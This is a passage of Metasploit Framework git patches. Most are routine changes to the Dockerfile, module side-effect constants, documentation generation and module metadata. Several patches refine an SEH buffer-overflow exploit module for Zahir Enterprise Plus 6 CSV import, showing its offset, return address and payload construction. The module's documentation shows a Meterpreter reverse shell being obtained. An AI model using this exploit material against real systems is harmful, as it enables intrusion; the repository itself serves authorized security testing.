/usr/src/metasploit-framework/ -ENV NMAP_PRIVILEGED="" ENV BUNDLE_IGNORE_MESSAGES="true" WORKDIR $APP_HOME @@ -12,20 +11,7 @@ COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/vers COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb -RUN apk update && \ - apk add \ - bash \ - sqlite-libs \ - nmap \ - nmap-scripts \ - nmap-nselibs \ - postgresql-libs \ - python \ - python3 \ - ncurses \ - libcap \ - su-exec \ - && apk add --virtual .ruby-builddeps \ +RUN apk add --no-cache \ autoconf \ bison \ build-base \ @@ -44,15 +30,26 @@ RUN apk update && \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && gem update --system \ && gem install bundler \ - && bundle install --system $BUNDLER_ARGS \ - && apk del .ruby-builddeps \ - && rm -rf /var/cache/apk/* + && bundle install --system $BUNDLER_ARGS +COPY . $APP_HOME + +FROM ruby:2.5.1-alpine3.7 +LABEL maintainer="Rapid7" + +ENV APP_HOME /usr/src/metasploit-framework/ +ENV NMAP_PRIVILEGED="" + +COPY --from=builder /usr/local/bundle /usr/local/bundle +COPY --from=builder $APP_HOME $APP_HOME + +RUN chmod -R a+r /usr/local/bundle +RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec + +WORKDIR $APP_HOME RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap) -ADD ./ $APP_HOME - # we need this entrypoint to dynamically create a user # matching the hosts UID and GID so we can mount something # from the users home directory. If the IDs don't match From fa92808cc6e4f3f7eb1f1abe3de8956272370d98 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 3 Oct 2018 20:32:00 -0500 Subject: [PATCH 153/192] Add PHYSICAL_EFFECTS constant --- lib/msf/core/constants.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index f2a2416b65..ac18d2891d 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -82,6 +82,8 @@ IOC_IN_LOGS = 'ioc-in-logs' ACCOUNT_LOCKOUTS = 'account-lockouts' # Module may show something on the screen (Example: a window pops up) SCREEN_EFFECTS = 'screen-effects' +# Module may produce physical effects (Examples: light, sound, or heat) +PHYSICAL_EFFECTS = 'physical-effects' # # Reliability From 97ebc832f01996f5e064f5fff6a97b8e73b3cff5 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 3 Oct 2018 20:34:24 -0500 Subject: [PATCH 154/192] Clarify target of PHYSICAL_EFFECTS --- lib/msf/core/constants.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index ac18d2891d..26431ef6b2 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -82,7 +82,7 @@ IOC_IN_LOGS = 'ioc-in-logs' ACCOUNT_LOCKOUTS = 'account-lockouts' # Module may show something on the screen (Example: a window pops up) SCREEN_EFFECTS = 'screen-effects' -# Module may produce physical effects (Examples: light, sound, or heat) +# Module may produce physical effects in hardware (Examples: light, sound, or heat) PHYSICAL_EFFECTS = 'physical-effects' # From 92ac5635b1313f15b196e335bdc2c6bd3111e84c Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 3 Oct 2018 23:35:30 -0500 Subject: [PATCH 155/192] Support module documentation --- data/markdown_doc/default_template.erb | 14 +++++++++- lib/msf/util/document_generator.rb | 3 +++ lib/msf/util/document_generator/normalizer.rb | 26 +++++++++++++++++++ 3 files changed, 42 insertions(+), 1 deletion(-) diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb index b9fde0462c..76174bafca 100644 --- a/data/markdown_doc/default_template.erb +++ b/data/markdown_doc/default_template.erb @@ -14,10 +14,22 @@ <%= normalize_platforms(items[:mod_platforms]) %> <% end %> -## Reliability +## Module Ranking <%= normalize_rank(items[:mod_rank]) %> +## Side Effects + +<%= normalize_side_effects(items[:mod_side_effects]) %> + +## Reliability + +<%= normalize_reliability(items[:mod_reliability]) %> + +## Stability + +<%= normalize_stability(items[:mod_stability]) %> + ## Related Pull Requests <%= normalize_pull_requests(items[:mod_pull_requests]) %> diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 8671df9d4f..c300ee82e9 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -63,6 +63,9 @@ module Msf mod_rank: mod.rank, mod_platforms: mod.send(:module_info)['Platform'], mod_options: mod.options, + mod_side_effects: mod.side_effects, + mod_reliability: mod.reliability, + mod_stability: mod.stability, mod_demo: mod } diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 77fa201fb4..e096fe1d06 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -256,6 +256,32 @@ module Msf end + # Returns the markdown format for module side effects. + # + # @param side_effects [Array] Module effects. + # @return [String] + def normalize_side_effects(side_effects) + md_side_effects = side_effects.collect { |s| "* #{s}\n" }.join + md_side_effects.empty? ? 'N/A' : md_side_effects + end + + + # Returns the markdown format for module reliability. + # + # @param reliability [Array] Module reliability. + # @return [String] + def normalize_reliability(reliability) + md_reliability = reliability.collect { |r| "* #{r}\n" }.join + md_reliability.empty? ? 'N/A' : md_reliability + end + + + def normalize_stability(stability) + md_stability = stability.collect { |s| "* #{s}\n" }.join + md_stability.empty? ? 'N/A' : md_stability + end + + # Returns a parsed demo ERB template. # # @param mod [Msf::Module] Metasploit module. From bb255e1de73f4f88ae7bf87c77b47d6b26128927 Mon Sep 17 00:00:00 2001 From: Mostafa Hussein Date: Thu, 4 Oct 2018 10:54:21 +0200 Subject: [PATCH 156/192] Update Dockerfile --- Dockerfile | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/Dockerfile b/Dockerfile index b2b3d7799e..9e51ea8770 100644 --- a/Dockerfile +++ b/Dockerfile @@ -30,9 +30,7 @@ RUN apk add --no-cache \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && gem update --system \ && gem install bundler \ - && bundle install --system $BUNDLER_ARGS - -COPY . $APP_HOME + && bundle install --clean --no-cache --system $BUNDLER_ARGS FROM ruby:2.5.1-alpine3.7 LABEL maintainer="Rapid7" @@ -41,7 +39,7 @@ ENV APP_HOME /usr/src/metasploit-framework/ ENV NMAP_PRIVILEGED="" COPY --from=builder /usr/local/bundle /usr/local/bundle -COPY --from=builder $APP_HOME $APP_HOME +COPY . $APP_HOME RUN chmod -R a+r /usr/local/bundle RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec From 144c76ecd4739a1f4773fd5e428ec781f3fb1e40 Mon Sep 17 00:00:00 2001 From: Thomas Gregory Date: Thu, 4 Oct 2018 16:18:02 +0700 Subject: [PATCH 157/192] Latest fix based on @jrobles-r7 recommendations Fixing: - MetasploitModule class changed - Remove the word 'exploit' from name - Remove StackAdjustment - Remove Privileged option - Remove make_nops(12) - Remove extra buffer at the end of exploit --- .../fileformat/zahir_enterprise_plus_csv.rb | 17 ++++++----------- 1 file changed, 6 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb index 65a722a1e5..50b72e778b 100644 --- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb +++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class MetasploitModule < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit Rank = NormalRanking include Msf::Exploit::FILEFORMAT @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "Zahir Enterprise Plus 6 Stack Buffer Overflow Exploit", + 'Name' => "Zahir Enterprise Plus 6 Stack Buffer Overflow", 'Description' => %q{ This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below. The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters @@ -20,8 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'f3ci', # found the vulnerability - 'modpr0be' # Metasploit Module + 'f3ci', # initial discovery + 'modpr0be' # poc and Metasploit Module ], 'References' => [ @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal', { #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) - 'Ret' => 0x52016661, + 'Ret' => 0x52016661, 'Offset' => 3041 } ] @@ -44,10 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote { 'Space' => 5000, 'BadChars' => "\x00\x0a\x0d\x22\x2c", - 'DisableNops' => true, - 'StackAdjustment' => -3500 + 'DisableNops' => true }, - 'Privileged' => false, 'DisclosureDate' => 'Sep 28 2018', 'DefaultTarget' => 0)) @@ -63,10 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote buf << "\r\n" # crash chars buf << rand_text_alpha_upper(380) # extra chars to hit the offset buf << generate_seh_record(target.ret) - buf << make_nops(12) buf << payload.encoded - # Size isn't very sensitive - buf << rand_text_alpha_upper(1200) file_create(buf) end From b2d0b580cf102540ffa09a2c21a20f2663077ab8 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 4 Oct 2018 04:24:53 -0500 Subject: [PATCH 158/192] Fix rspec --- spec/lib/msf/util/document_generator/normalizer_spec.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/spec/lib/msf/util/document_generator/normalizer_spec.rb b/spec/lib/msf/util/document_generator/normalizer_spec.rb index ae3e6289fc..2a46e9392d 100644 --- a/spec/lib/msf/util/document_generator/normalizer_spec.rb +++ b/spec/lib/msf/util/document_generator/normalizer_spec.rb @@ -63,6 +63,9 @@ RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do allow(mod).to receive(:type).and_return(mod_type) allow(mod).to receive(:shortname).and_return(mod_shortname) allow(mod).to receive(:targets).and_return(mod_targets) + allow(mod).to receive(:side_effects).and_return([]) + allow(mod).to receive(:stability).and_return([]) + allow(mod).to receive(:reliability).and_return([]) mod end @@ -84,6 +87,9 @@ RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do mod_rank: msf_mod.rank, mod_platforms: msf_mod.send(:module_info)['Platform'], mod_options: msf_mod.options, + mod_side_effects: msf_mod.side_effects, + mod_reliability: msf_mod.reliability, + mod_stability: msf_mod.stability, mod_demo: msf_mod } expect(subject.get_md_content(items, '')).to include('') From 598f1fb422fa561352862a26c4f22a306b00fafd Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Oct 2018 02:37:15 -0700 Subject: [PATCH 159/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 9d049f54ac..baadb825ab 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -146437,19 +146437,19 @@ "author": [ "egypt " ], - "description": "Push a file and execute it", + "description": "Push a file and execute it.", "references": [ ], "is_server": false, "is_client": false, - "platform": "Linux,OSX,Windows", + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", "arch": "", "rport": null, "autofilter_ports": null, "autofilter_services": null, "targets": null, - "mod_time": "2018-07-26 19:29:46 +0000", + "mod_time": "2018-10-02 21:33:01 +0000", "path": "/modules/post/multi/manage/upload_exec.rb", "is_install_path": true, "ref_name": "multi/manage/upload_exec", From 32f91d537cf891ce2add763f7a36a5e583e48818 Mon Sep 17 00:00:00 2001 From: Mostafa Hussein Date: Thu, 4 Oct 2018 13:23:55 +0200 Subject: [PATCH 160/192] remove bundle cache after install --- Dockerfile | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Dockerfile b/Dockerfile index 9e51ea8770..adccd2e303 100644 --- a/Dockerfile +++ b/Dockerfile @@ -30,7 +30,9 @@ RUN apk add --no-cache \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && gem update --system \ && gem install bundler \ - && bundle install --clean --no-cache --system $BUNDLER_ARGS + && bundle install --clean --no-cache --system $BUNDLER_ARGS \ + # temp fix for https://github.com/bundler/bundler/issues/6680 + && rm -rf /usr/local/bundle/cache FROM ruby:2.5.1-alpine3.7 LABEL maintainer="Rapid7" From 8bd6f4ac5d756c154373e16355896aa97427918e Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Oct 2018 04:53:58 -0700 Subject: [PATCH 161/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 47 +++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index baadb825ab..b6d0e295d5 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -62600,6 +62600,53 @@ "notes": { } }, + "exploit_multi/http/navigate_cms_rce": { + "name": "Navigate CMS Unauthenticated Remote Code Execution", + "full_name": "exploit/multi/http/navigate_cms_rce", + "rank": 600, + "disclosure_date": "2018-09-26", + "type": "exploit", + "author": [ + "Pyriphlegethon" + ], + "description": "This module exploits insufficient sanitization in the database::protect\n method, of Navigate CMS versions 2.8 and prior, to bypass authentication.\n\n The module then uses a path traversal vulnerability in navigate_upload.php\n that allows authenticated users to upload PHP files to arbitrary locations.\n Together these vulnerabilities allow an unauthenticated attacker to\n execute arbitrary PHP code remotely.\n\n This module was tested against Navigate CMS 2.8.", + "references": [ + "CVE-2018-17552", + "CVE-2018-17553" + ], + "is_server": true, + "is_client": false, + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2018-10-02 06:57:04 +0000", + "path": "/modules/exploits/multi/http/navigate_cms_rce.rb", + "is_install_path": true, + "ref_name": "multi/http/navigate_cms_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "exploit_multi/http/netwin_surgeftp_exec": { "name": "Netwin SurgeFTP Remote Command Execution", "full_name": "exploit/multi/http/netwin_surgeftp_exec", From 30423b33edeaa2cce091208c0a36909fc6d0aeb7 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 4 Oct 2018 16:21:46 +0200 Subject: [PATCH 162/192] reduce docker image size --- Dockerfile | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/Dockerfile b/Dockerfile index adccd2e303..667a197a32 100644 --- a/Dockerfile +++ b/Dockerfile @@ -32,7 +32,10 @@ RUN apk add --no-cache \ && gem install bundler \ && bundle install --clean --no-cache --system $BUNDLER_ARGS \ # temp fix for https://github.com/bundler/bundler/issues/6680 - && rm -rf /usr/local/bundle/cache + && rm -rf /usr/local/bundle/cache \ + # needed so non root users can read content of the bundle + && chmod -R a+r /usr/local/bundle + FROM ruby:2.5.1-alpine3.7 LABEL maintainer="Rapid7" @@ -43,13 +46,12 @@ ENV NMAP_PRIVILEGED="" COPY --from=builder /usr/local/bundle /usr/local/bundle COPY . $APP_HOME -RUN chmod -R a+r /usr/local/bundle RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec -WORKDIR $APP_HOME RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap) +WORKDIR $APP_HOME # we need this entrypoint to dynamically create a user # matching the hosts UID and GID so we can mount something # from the users home directory. If the IDs don't match From 060c68d2e0c1049362325d430d1dc9fafa24fe64 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Thu, 4 Oct 2018 10:10:09 -0500 Subject: [PATCH 163/192] Aligment, minor modifications --- .../fileformat/zahir_enterprise_plus_csv.rb | 28 +++++++++---------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb index 50b72e778b..9d10b0b75f 100644 --- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb +++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb @@ -17,37 +17,36 @@ class MetasploitModule < Msf::Exploit The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters via Import from other File. This results in overwriting a structured exception handler record. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'f3ci', # initial discovery 'modpr0be' # poc and Metasploit Module ], - 'References' => + 'References' => [ [ 'CVE', '2018-17408' ], [ 'EDB', '45505' ] ], - 'Platform' => 'win', - 'Targets' => + 'Platform' => 'win', + 'Targets' => [ - [ - 'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal', + ['Zahir Enterprise Plus 6 <= build 10b', { #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) - 'Ret' => 0x52016661, - 'Offset' => 3041 + 'Ret' => 0x52016661, + 'Offset' => 3041 } ] ], - 'Payload' => + 'Payload' => { - 'Space' => 5000, - 'BadChars' => "\x00\x0a\x0d\x22\x2c", + 'Space' => 5000, + 'BadChars' => "\x00\x0a\x0d\x22\x2c", 'DisableNops' => true }, - 'DisclosureDate' => 'Sep 28 2018', - 'DefaultTarget' => 0)) + 'DisclosureDate' => 'Sep 28 2018', + 'DefaultTarget' => 0)) register_options( [ @@ -56,7 +55,6 @@ class MetasploitModule < Msf::Exploit end def exploit - buf = rand_text_alpha_upper(target['Offset']) buf << "\r\n" # crash chars buf << rand_text_alpha_upper(380) # extra chars to hit the offset From b5c13690c0e0f0be8bcc590d0ef0cdc7da81ff3d Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Thu, 4 Oct 2018 10:12:12 -0500 Subject: [PATCH 164/192] Add documentation for Zahir Import File Module --- .../fileformat/zahir_enterprise_plus_csv.md | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md diff --git a/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md new file mode 100644 index 0000000000..9673672ae2 --- /dev/null +++ b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md @@ -0,0 +1,41 @@ +## Description + +Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vulnerability in its Import file functionality, which can be triggered with a crafted CSV file. + +## Vulnerable Application + +[Zahir Enterprise 6](http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip) through build 10.b + +[Update to build 10b](http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip) + +## Verification Steps + +1. `./msfconsole -q` +2. `use exploit/windows/fileformat/zahir_enterprise_plus_csv` +3. `run` +4. `handler -p -H -P ` +5. From Zahir Application. File -> Import -> Import from File -> Select option -> Specify msf generated file -> Click through to Process +6. Get a session + +## Scenarios + +### Zahir Enterprise 6 build 10b on Windows 10 x64 + +``` +msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) > +[*] Started reverse TCP handler on 172.22.222.130:4444 +[*] Sending stage (179779 bytes) to 172.22.222.200 +[*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500 +sessions -i 4 +[*] Starting interaction with 4... + +meterpreter > sysinfo +Computer : DESKTOP-IPOGIJR +OS : Windows 10 (Build 17134). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +meterpreter > +``` From 27b6ff14a8e5e0bbe51e9381cc041e8e29b6dd75 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Oct 2018 08:18:06 -0700 Subject: [PATCH 165/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index b6d0e295d5..024f153897 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -45792,11 +45792,11 @@ "Unix In-Memory", "Linux Dropper" ], - "mod_time": "2018-07-31 19:49:17 +0000", + "mod_time": "2018-09-27 23:51:42 +0000", "path": "/modules/exploits/linux/http/axis_srv_parhand_rce.rb", "is_install_path": true, "ref_name": "linux/http/axis_srv_parhand_rce", - "check": false, + "check": true, "post_auth": false, "default_credential": false, "notes": { From e9928a41a1db3205b732d7866574cde6c53288a9 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Oct 2018 09:10:27 -0700 Subject: [PATCH 166/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 024f153897..2d5c6ffefc 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -99804,6 +99804,45 @@ "notes": { } }, + "exploit_windows/fileformat/zahir_enterprise_plus_csv": { + "name": "Zahir Enterprise Plus 6 Stack Buffer Overflow", + "full_name": "exploit/windows/fileformat/zahir_enterprise_plus_csv", + "rank": 300, + "disclosure_date": "2018-09-28", + "type": "exploit", + "author": [ + "f3ci", + "modpr0be" + ], + "description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.", + "references": [ + "CVE-2018-17408", + "EDB-45505" + ], + "is_server": true, + "is_client": false, + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": [ + "Zahir Enterprise Plus 6 <= build 10b" + ], + "mod_time": "2018-10-04 10:10:09 +0000", + "path": "/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/zahir_enterprise_plus_csv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "exploit_windows/fileformat/zinfaudioplayer221_pls": { "name": "Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow", "full_name": "exploit/windows/fileformat/zinfaudioplayer221_pls", From 8d7bfee9ec713906299889a6b44d28d1198fb549 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Oct 2018 10:10:01 -0700 Subject: [PATCH 167/192] Weekly dependency update --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 78682b619c..ff09d5f350 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -113,7 +113,7 @@ GEM backports (3.11.4) bcrypt (3.1.12) bcrypt_pbkdf (1.0.0) - bindata (2.4.3) + bindata (2.4.4) bit-struct (0.16) builder (3.2.3) coderay (1.1.2) From f5190525fcfb0ea3f66e385271c3d103d034998f Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 4 Oct 2018 13:20:47 -0500 Subject: [PATCH 168/192] support for multiple module types --- lib/msf/base/serializer/readable_text.rb | 60 +++++++++++++++--------- 1 file changed, 37 insertions(+), 23 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 4d262624c3..5363b740c5 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -155,29 +155,8 @@ class ReadableText tbl.to_s + "\n" end - # Dumps information about an exploit module. - # - # @param mod [Msf::Exploit] the exploit module. - # @param indent [String] the indentation to use. - # @return [String] the string form of the information. - def self.dump_exploit_module(mod, indent = '') - output = "\n" - output << " Name: #{mod.name}\n" - output << " Module: #{mod.fullname}\n" - output << " Platform: #{mod.platform_to_s}\n" - output << " Arch: #{mod.arch_to_s}\n" - output << " Privileged: " + (mod.privileged? ? "Yes" : "No") + "\n" - output << " License: #{mod.license}\n" - output << " Rank: #{mod.rank_to_s.capitalize}\n" - output << " Disclosed: #{mod.disclosure_date}\n" if mod.disclosure_date - output << "\n" - - # Authors - output << "Provided by:\n" - mod.each_author { |author| - output << indent + author.to_s + "\n" - } - output << "\n" + def self.dump_traits(mod, indent=' ') + output = '' unless mod.side_effects.empty? output << "Module side effects:\n" @@ -203,6 +182,35 @@ class ReadableText output << "\n" end + output + end + + # Dumps information about an exploit module. + # + # @param mod [Msf::Exploit] the exploit module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. + def self.dump_exploit_module(mod, indent = '') + output = "\n" + output << " Name: #{mod.name}\n" + output << " Module: #{mod.fullname}\n" + output << " Platform: #{mod.platform_to_s}\n" + output << " Arch: #{mod.arch_to_s}\n" + output << " Privileged: " + (mod.privileged? ? "Yes" : "No") + "\n" + output << " License: #{mod.license}\n" + output << " Rank: #{mod.rank_to_s.capitalize}\n" + output << " Disclosed: #{mod.disclosure_date}\n" if mod.disclosure_date + output << "\n" + + # Authors + output << "Provided by:\n" + mod.each_author { |author| + output << indent + author.to_s + "\n" + } + output << "\n" + + output << dump_traits(mod) + # Targets output << "Available targets:\n" output << dump_exploit_targets(mod, indent) @@ -266,6 +274,8 @@ class ReadableText } output << "\n" + output << dump_traits(mod) + # Actions if mod.action output << "Available actions:\n" @@ -319,6 +329,8 @@ class ReadableText end output << "\n" + output << dump_traits(mod) + # Compatible session types if mod.session_types output << "Compatible session types:\n" @@ -416,6 +428,8 @@ class ReadableText } output << "\n" + output << dump_traits(mod) + # Description output << "Description:\n" output << word_wrap(Rex::Text.compress(mod.description)) From d1c51bd1b8287bad42b6cef63d805c5422c63d39 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Oct 2018 11:35:19 -0700 Subject: [PATCH 169/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 2d5c6ffefc..82b89ed6f6 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -15636,7 +15636,7 @@ "https" ], "targets": null, - "mod_time": "2018-09-19 22:15:14 +0000", + "mod_time": "2018-09-27 12:31:04 +0000", "path": "/modules/auxiliary/gather/pimcore_creds_sqli.rb", "is_install_path": true, "ref_name": "gather/pimcore_creds_sqli", @@ -15644,6 +15644,9 @@ "post_auth": false, "default_credential": false, "notes": { + "SideEffects": [ + "ioc-in-logs" + ] } }, "auxiliary_gather/qnap_backtrace_admin_hash": { @@ -112181,7 +112184,7 @@ "targets": [ "Windows 10 x64" ], - "mod_time": "2018-09-21 12:30:36 +0000", + "mod_time": "2018-09-26 21:13:37 +0000", "path": "/modules/exploits/windows/local/alpc_taskscheduler.rb", "is_install_path": true, "ref_name": "windows/local/alpc_taskscheduler", @@ -112189,6 +112192,12 @@ "post_auth": false, "default_credential": false, "notes": { + "Stability": [ + "os-resource-loss" + ], + "Reliability": [ + "repeatable-session" + ] } }, "exploit_windows/local/always_install_elevated": { From 566d540b87a2e3d82dce4640f01a95556d30168d Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 4 Oct 2018 14:05:39 -0500 Subject: [PATCH 170/192] Add AUDIO_EFFECTS to distinguish from others --- lib/msf/core/constants.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index 26431ef6b2..a8b25b320d 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -80,9 +80,11 @@ CONFIG_CHANGES = 'config-changes' IOC_IN_LOGS = 'ioc-in-logs' # Module may cause account lockouts (likely due to brute-forcing) ACCOUNT_LOCKOUTS = 'account-lockouts' -# Module may show something on the screen (Example: a window pops up) +# Module may cause software to show something on the screen (Example: a window pops up) SCREEN_EFFECTS = 'screen-effects' -# Module may produce physical effects in hardware (Examples: light, sound, or heat) +# Module may cause software to output audio from the speakers (Example: the app plays music) +AUDIO_EFFECTS = 'audio-effects' +# Module may produce physical effects in hardware (Examples: LED or LCD changes or hardware beeps) PHYSICAL_EFFECTS = 'physical-effects' # From 9e512b0246c048ed2f8adfc452dbe7306873bfeb Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 4 Oct 2018 14:20:26 -0500 Subject: [PATCH 171/192] Clarify {SCREEN,AUDIO,PHYSICAL}_EFFECTS --- lib/msf/core/constants.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index a8b25b320d..4ef3cbb7ff 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -80,11 +80,11 @@ CONFIG_CHANGES = 'config-changes' IOC_IN_LOGS = 'ioc-in-logs' # Module may cause account lockouts (likely due to brute-forcing) ACCOUNT_LOCKOUTS = 'account-lockouts' -# Module may cause software to show something on the screen (Example: a window pops up) +# Module may show something on the screen (Example: a window pops up) 